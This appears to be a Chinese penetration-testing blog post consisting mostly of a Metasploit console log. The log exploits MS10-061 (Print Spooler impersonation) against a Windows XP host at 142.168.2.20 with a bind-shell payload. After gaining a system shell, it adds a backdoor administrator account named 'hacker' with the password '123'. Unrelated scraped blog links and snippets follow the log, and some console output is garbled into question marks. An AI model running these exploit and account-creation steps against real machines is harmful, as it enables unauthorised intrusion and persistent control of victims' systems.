渗透杂记-2013-07-13 ms10_061_spoolss
[*] Please wait while the Metasploit Pro Console initializes...
[*] Starting Metasploit Console...
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 840 exploits - 495 auxiliary - 146 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > search ms10_061
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation
Vulnerability
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 14976
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck <jduck@metasploit.com>
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20
RHOST => 142.168.2.20
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 14976
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck <jduck@metasploit.com>
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST 142.168.2.20 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > exploit
[*] Started bind handler
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...
[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61
[*] Job started: 0x4
[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe
[*] Job started: 0x5
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (240 bytes) to 142.168.2.20
Microsoft Windows XP [???? 5.1.2600]
(C) ???????? 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user
net user
\\ ??????????
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy
SUPPORT_388945a0
????????????????????????????????????
C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
net user hacker 123 /add & net localgroup administrators hacker /add
??????????????
??????????????
C:\WINDOWS\system32>net user
net user
\\ ??????????
-------------------------------------------------------------------------------
Administrator Guest hacker
HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC
shentouceshiwy SUPPORT_388945a0
????????????????????????????????????
C:\WINDOWS\system32>
渗透杂记-2013-07-13 ms10_061_spoolss的更多相关文章
- http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html
http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html
- http://www.ruanyifeng.com/blog/2013/07/gpg.html
http://www.ruanyifeng.com/blog/2013/07/gpg.html
- 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html
http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html
- <2013 07 31> 没有必然的理由
<2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...
- 渗透杂记-2013-07-13 关于SMB版本的扫描
smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...
- 渗透杂记-2013-07-13 windows/mssql/mssql_payload
扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...
- 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...
- <2013 07 06> "极路由" 与 “家庭服务器” 报道两则
跟我做!打造家庭服务器 很久没有更新了,因为之前托朋友帮我弄的mini PC终于到手了.阴差阳错地,原来只打算弄一台将就可用的低功耗下载机,结果到手的却是一台支持1080p(宣称,还没烧过),还带遥控 ...
- Cheatsheet: 2013 07.21 ~ 07.31
Mobile Android vs. iOS: Comparing the Development Process of the GQueues Mobile Apps Android Studio ...
随机推荐
- redhat note
1,iptables -I INPUT 5 -m state --state NEW -p tcp --dport 80 -j ACCEPT
- DataTable 转 List<T>
最近在做一个项目,表的数据巨多,而且表的字段一般都在30个以上.公司规定不能用Nhibernate以及ef等ORM框架. 所以查询绑定时的工作量极为痛苦.没有办法,自己写了个DataTableToLi ...
- 第九章伪代码编程过程 The PseudoCode Programming Process
目录: 1.创建类和子程序的步骤概述 2.伪代码 3.通过伪代码编程过程创建子程序 4.伪代码编程过程的替代方案 一.创建类和子程序的步骤概述 (1)创建一个类的步骤 1.创建类的总体设计 2.创建类 ...
- android service两种启动方式
android service的启动方式有以下两种: 1.Context.startService()方式启动,生命周期如下所示,启动时,startService->onCreate()-> ...
- url传参中文乱码
当使用url重定向传参的时候,比如: javascript:window.location.href='modifyBook.jsp?BName=<%=URLEncoder.encode(&qu ...
- php 设计模式
一.工厂模式 1.创建接口类,规范方法,要实现这个接口的类必须实现这个接口的所有方法,接口的方法默认是抽象的,所以不再方法前面加 abstract interface people{ public f ...
- sed tr 去除PATH中的重复项
最近发现由于自己不良的安装软件的习惯,shell的PATH路径包含了很多冗余的项.这里使用shell命令去除PATH的冗余项. export PATH=$(echo $PATH | sed 's/:/ ...
- 配置Report Server超时
http://blogs.msdn.com/b/mariae/archive/2009/09/24/troubleshooting-timeout-errors-in-reporting-servic ...
- HttpGet 请求(带参数)
package com.example.util; import java.io.BufferedReader;import java.io.IOException;import java.io.In ...
- 用 正则表达式 限定XML simpleType 定义
<xsd:simpleType name="ResTrictions"> <xsd:restriction base="xsd:string" ...